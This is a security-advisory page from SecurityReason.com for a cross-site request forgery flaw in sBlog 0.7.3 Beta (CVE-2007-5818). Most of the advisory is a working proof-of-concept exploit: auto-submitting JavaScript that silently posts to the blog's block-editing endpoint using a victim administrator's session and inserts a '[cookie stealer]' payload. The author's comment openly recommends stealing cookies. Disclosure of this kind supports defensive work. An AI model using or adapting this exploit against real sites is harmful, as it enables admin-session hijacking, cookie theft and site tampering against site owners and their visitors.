SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

sBlog 0.7.3 Beta Cross Site Request Forgery


Arrow  SecurityAlert : 3341
Arrow  CVE : CVE-2007-5818
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : 0x90
Arrow  Published : 05.11.2007

Arrow  Affected Software : sBlog 0.7.3 Beta



Arrow  Advisory Content :  

<!--

- Product : sBlog

-

- Version : 0.7.3 Beta

-

- Website : http://www.sblog.se

-

- Author : 0x90

-

- Homepage: WwW.0x90.CoM.Ar

-

- Contact : Guns[at]0x90[dot]com[dot]ar

-

- Problem : Cross Site Request Forgery Vulnerability

-

- Sumary : sBlog has, by default, no CSRF protection, this may allow an
attacker

to change any block by tricking a victim with admin privileges

into a special forged web page (even in a a totally different server)

that sends a request to change one block in the web. The

victim does not know that the form was sent. If the victim has admin

privileges the exploit will succeed, otherwise nothing will happen.

-

- Note : I recommend steal the cookie ;)

-

- Greetz : xiam ;) Visit: xiam.be

-->

<script type="text/javascript">

window.onload = function() {

var url = "http://[URL]/blocks_edit_do.php";

var bid = [block id];

var topic = [name block];

var content = [cookie stealer];

var param = {

id: bid,

block_topic: topic,

block_content: content,

block_vis: 1,

block_style: 1,

block_top: 1

};

var form = document.createElement('form');

form.action = url;

form.method = 'post';

form.target = 'hidden';

form.style.display = 'none';

for (var i in param) {

try {

// ie

var input = document.createElement('<input name="'+i+'">');

} catch(e) {

// other browsers

var input = document.createElement('input');

input.name = i;

}

input.setAttribute('value', param[i]);

form.appendChild (input);

}

document.body.appendChild(form);

form.submit();

}

</script>

<iframe name="hidden" style="display: none"></iframe>






Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.